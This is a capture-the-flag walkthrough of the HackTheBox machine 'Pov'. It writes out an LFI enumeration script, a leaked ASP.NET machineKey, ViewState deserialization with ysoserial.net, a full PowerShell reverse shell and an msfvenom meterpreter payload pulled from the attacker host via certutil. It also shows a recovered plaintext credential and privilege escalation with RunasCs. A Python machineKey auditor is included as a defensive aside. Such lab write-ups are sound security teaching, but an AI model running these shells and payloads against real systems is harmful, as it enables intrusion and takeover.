Pov

Only port 80 is open.
dirsearch finds nothing accessible on the main vhost, so move on to vhost enumeration:
echo "10.129.29.23 pov.htb" >> /etc/hosts
sudo gobuster vhost -u http://pov.htb -w /usr/share/wordlists/dnsmap.txt
Found the dev.pov.htb subdomain (status 302). Add it to /etc/hosts as well and enumerate it:
./dirsearch.py -u http://dev.pov.htb/portfolio/ -x 404,302,403
Pressing “download” on the portfolio page sends a POST with a file parameter to the download handler.
As we can see, the download endpoint has an LFI. A small script to enumerate files through it:
#!/bin/bash

# Request one path through the LFI in the download handler and print the
# response, or a "not found" marker when the server answers with its 404 page.
lfi() {
    local path="$1"
    local url="http://dev.pov.htb/portfolio/"
    local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"

    if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
        if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
            echo -e "\e[32m$response\e[0m"
        else
            echo -e "\e[31m$path not found.\e[0m"
        fi
    else
        # curl itself failed: show the HTTP status code of a retry (the original used an undefined $params here)
        echo -e "\e[31mLFI Error : $(curl -s -k -X POST --data-binary "$data" "$url" -o /dev/null -w '%{http_code}')\e[0m"
    fi
}

# Interactive loop: read a path, fetch it, repeat.
main() {
    while true; do
        read -r -p $'\e[34m[+] file >> \e[0m' path
        lfi "$path"
    done
}

if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
    main
fi
Found web.config by enumeration. It discloses the machineKey, i.e. both the decryption key and the validation key:
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
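A static machineKey in a web.config that the application itself can serve is the root cause here: whoever reads it can sign ViewState. The following audit helper is an added example (not from the original write-up) that parses a web.config and reports weak or static machineKey settings; the sample config is constructed around the element disclosed above.

```python
import xml.etree.ElementTree as ET

# Constructed sample web.config wrapping the disclosed machineKey element.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey decryption="AES"
                decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
                validation="SHA1"
                validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>"""

# Constructed hardened variant: per-app auto-generated keys, HMACSHA256 MAC.
HARDENED_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey decryption="AES" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" validationKey="AutoGenerate,IsolateApps" />
  </system.web>
</configuration>"""

# Validation algorithms that are not HMACSHA256/384/512.
WEAK_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}


def audit_machine_key(xml_text: str) -> list:
    """Return a list of findings for the <machineKey> settings in a web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        # No explicit element: ASP.NET auto-generates keys per server.
        return findings
    validation = mk.get("validation", "HMACSHA256").upper()
    if validation in WEAK_VALIDATION:
        findings.append(f"validation={validation}: use HMACSHA256 or stronger")
    for attr in ("decryptionKey", "validationKey"):
        value = mk.get(attr, "")
        if "AUTOGENERATE" in value.upper():
            continue  # not stored in the file, nothing to leak
        findings.append(f"{attr} is a static key in web.config: anyone who can read the file can forge ViewState")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState carries no integrity check at all")
    return findings
```

Run it against every web.config in a deployment; the cure for a leaked static key is rotating it, not just closing the file-read bug.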
Googling the disclosed keys leads to ViewState deserialization. On a Windows box, use this tool:
git clone https://github.com/NHPT/ysoserial.net.git
Generate a PowerShell reverse shell in rev.ps1:
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.31',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
CODE=$(cat rev.ps1 | iconv -t utf-16le | base64 -w 0; echo); echo "powershell -enc $CODE"
This base64-encodes it (UTF-16LE) into an -enc command:
powershell -enc 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
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -enc 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" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
The generated payload:
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
Replace the __VIEWSTATE value in the intercepted POST request (Burp) with it to get the initial shell:
PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

A credential is found by searching the user's Documents folder:
$credential = Import-Clixml -Path "c:\users\sfitz\documents\connection.xml"
echo ($credential.UserName + ":" + $credential.GetNetworkCredential().Password)
alaading:f8gQ8fynP44ek1m3
$username = 'alaading'
$password = 'f8gQ8fynP44ek1m3'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e 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}

This gives a shell as user alaading:
PS C:\Users\alaading\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeDebugPrivilege is present but disabled.

RunasCs:

Create an msfvenom reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.31 LPORT=7777 -f exe -o reverse.exe
certutil -urlcache -f http://10.10.14.31:8000/reverse.exe reverse.exe
certutil -urlcache -f http://10.10.14.31:8000/RunasCs.exe RunasCs.exe

Catch the connection with a handler in msfconsole, then run:
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 "C:\\Users\\alaading\\Desktop\\reverse.exe"
ps
The PID of winlogon is 540.

Got root.